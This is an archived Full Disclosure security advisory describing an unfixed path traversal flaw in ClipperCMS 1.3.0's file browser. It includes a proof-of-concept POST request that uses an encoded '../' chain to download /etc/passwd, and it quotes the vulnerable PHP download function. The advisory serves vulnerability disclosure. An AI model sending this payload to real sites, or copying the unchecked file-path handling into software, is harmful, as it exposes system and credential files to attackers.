| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 13 Nov 2015 17:06:43 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] ClipperCMS 1.3.0: Path Traversal
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
CVSS
Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
Description
The "file" Parameter of the file browser is vulnerable to directory traversal,
allowing the download of arbitrary files.
A user account is needed with at least the lowest default role, which is
"Editor".
3. Proof of Concept
POST /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1
dir=images&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4. Code
/ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/core/browser.php
protected function act_download() {
$dir = $this->postDir();
if (!isset($this->post['dir']) ||
!isset($this->post['file']) ||
(false === ($file = "$dir/{$this->post['file']}")) ||
!file_exists($file) || !is_readable($file)
)
$this->errorMsg("Unknown error.");
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private", false);
header("Content-Type: application/octet-stream");
header('Content-Disposition: attachment; filename="' . str_replace('"', "_", $this->post['file']) . '"');
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($file));
readfile($file);
die;
}
5. Solution
This issue has not been fixed by the vendor.
6. Report Timeline
10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-Path-Traversal-98.html
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists